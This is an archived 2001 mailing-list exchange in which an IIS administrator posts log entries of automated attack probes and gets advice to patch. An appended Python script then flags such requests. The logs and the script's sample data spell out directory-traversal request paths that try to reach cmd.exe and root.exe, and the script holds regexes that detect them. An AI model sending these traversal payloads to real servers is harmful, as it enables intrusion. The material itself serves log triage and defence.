[ale] *OT* But, I need some help.

Jim Popovitch jimpop at yahoo.com
Sun Oct 21 17:17:47 EDT 2001


Hi Jeb,

Those are "standard" attempts for known IIS exploits.  I get hundreds of them a
day on a few sites that I have; of course my protection is Apache on Linux. ;)
Your mileage may vary.  I would suggest that you swiftly apply all known
service packs from the Microsoft website, as well as double check the BugTraq
archives to make sure you have everything covered.  Next I would suggest that
you follow the Gartner Group's advice about replacing IIS (this doesn't
necessarily have to be Apache on Linux).

-Jim P.
 
--- Jeb <jeb_barger at yahoo.com> wrote:
> 
> 
> After going through my logs on my winboze iis server, I have script kiddies
> (I think), hitting my boxen.
> However, I don't know what it is.  Could you lend me some of your advice?
> 
> 2001-10-21 20:55:04 65.28.91.203 - 65.28.182.80 80 GET /scripts/root.exe
> /c+dir 404 -
> 2001-10-21 20:55:04 65.28.91.203 - 65.28.182.80 80 GET /MSADC/root.exe
> /c+dir 404 -
> 2001-10-21 20:55:04 65.28.91.203 - 65.28.182.80 80 GET
> /c/winnt/system32/cmd.exe /c+dir 404 -
> 2001-10-21 20:55:04 65.28.91.203 - 65.28.182.80 80 GET
> /d/winnt/system32/cmd.exe /c+dir 404 -
> 2001-10-21 20:55:04 65.28.91.203 - 65.28.182.80 80 GET
> /scripts/..%5c../winnt/system32/cmd.exe /c+dir 404 -
> 2001-10-21 20:55:05 65.28.91.203 - 65.28.182.80 80 GET
> /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+dir 500 -
> 2001-10-21 20:55:05 65.28.91.203 - 65.28.182.80 80 GET
> /_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+dir 404 -
> 2001-10-21 20:55:05 65.28.91.203 - 65.28.182.80 80 GET
> /msadc/..%5c../..%5c../..%5c/..Á../..Á../..Á../winnt/system32/cmd.exe
> /c+dir 404 -
> 2001-10-21 20:55:05 65.28.91.203 - 65.28.182.80 80 GET
> /scripts/..Á../winnt/system32/cmd.exe /c+dir 404 -
> 2001-10-21 20:55:05 65.28.91.203 - 65.28.182.80 80 GET
> /scripts/winnt/system32/cmd.exe /c+dir 404 -
> 2001-10-21 20:55:05 65.28.91.203 - 65.28.182.80 80 GET
> /winnt/system32/cmd.exe /c+dir 404 -
> 2001-10-21 20:55:06 65.28.91.203 - 65.28.182.80 80 GET
> /winnt/system32/cmd.exe /c+dir 404 -
> 2001-10-21 20:55:06 65.28.91.203 - 65.28.182.80 80 GET
> /scripts/..%5c../winnt/system32/cmd.exe /c+dir 404 -
> 2001-10-21 20:55:06 65.28.91.203 - 65.28.182.80 80 GET
> /scripts/..%5c../winnt/system32/cmd.exe /c+dir 404 -
> 2001-10-21 20:55:06 65.28.91.203 - 65.28.182.80 80 GET
> /scripts/..%5c../winnt/system32/cmd.exe /c+dir 404 -
> 2001-10-21 20:55:06 65.28.91.203 - 65.28.182.80 80 GET
> /scripts/..%2f../winnt/system32/cmd.exe /c+dir 404 -
> 
> Thanks!
> 
> ---
> This message has been sent through the ALE general discussion list.
> See http://www.ale.org/mailing-lists.shtml for more info. Problems should be 
> sent to listmaster at ale dot org.
> 
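
Requests like the ones in Jeb's log can be triaged mechanically. The following Python is an added example, not part of the original thread: it parses lines in the field layout Jeb posted, flags requests for cmd.exe/root.exe and directory traversal, and lists flagged requests that returned anything other than 404. The sample lines and addresses are constructed, and the function and field names are illustrative.

```python
import re
from collections import defaultdict
from urllib.parse import unquote

# Field order of the log lines quoted above (11 whitespace-separated fields).
FIELDS = ["date", "time", "c_ip", "user", "s_ip", "s_port",
          "method", "uri_stem", "uri_query", "status", "extra"]
EXE_RE = re.compile(r"/(cmd|root)\.exe$", re.I)   # command interpreter or its copy
TRAVERSAL_RE = re.compile(r"\.\.[/\\]")           # ../ or ..\ after decoding
ENCODED_RE = re.compile(r"\.\.%(5c|2f)", re.I)    # separator hidden by %-encoding

# Constructed sample input (documentation addresses, paths as seen in the thread).
SAMPLE_LOG = """\
2001-10-21 20:55:04 192.0.2.10 - 198.51.100.5 80 GET /scripts/root.exe /c+dir 404 -
2001-10-21 20:55:04 192.0.2.10 - 198.51.100.5 80 GET /scripts/..%5c../winnt/system32/cmd.exe /c+dir 404 -
2001-10-21 20:55:05 192.0.2.10 - 198.51.100.5 80 GET /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+dir 500 -
2001-10-21 20:55:06 192.0.2.10 - 198.51.100.5 80 GET /scripts/..%2f../winnt/system32/cmd.exe /c+dir 404 -
2001-10-21 20:56:10 192.0.2.77 - 198.51.100.5 80 GET /index.html - 200 -
""".splitlines()

def classify(uri_stem):
    """Return the reasons a request path looks like an IIS probe."""
    decoded = unquote(uri_stem)  # %5c becomes a backslash, %2f a slash
    reasons = set()
    if EXE_RE.search(decoded):
        reasons.add("shell-exe")
    if TRAVERSAL_RE.search(decoded):
        reasons.add("traversal")
    if ENCODED_RE.search(uri_stem):
        reasons.add("encoded-traversal")
    return reasons

def scan(lines):
    """Count probes per client IP and list those not answered with 404."""
    report = defaultdict(lambda: {"probes": 0, "non_404": []})
    for line in lines:
        parts = line.split()
        if line.startswith("#") or len(parts) != len(FIELDS):
            continue  # W3C header line or unexpected layout
        rec = dict(zip(FIELDS, parts))
        if classify(rec["uri_stem"]):
            report[rec["c_ip"]]["probes"] += 1
            if rec["status"] != "404":
                report[rec["c_ip"]]["non_404"].append((rec["uri_stem"], rec["status"]))
    return dict(report)

if __name__ == "__main__":
    for ip, info in scan(SAMPLE_LOG).items():
        print(ip, info["probes"], "probes; non-404:", info["non_404"])
```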

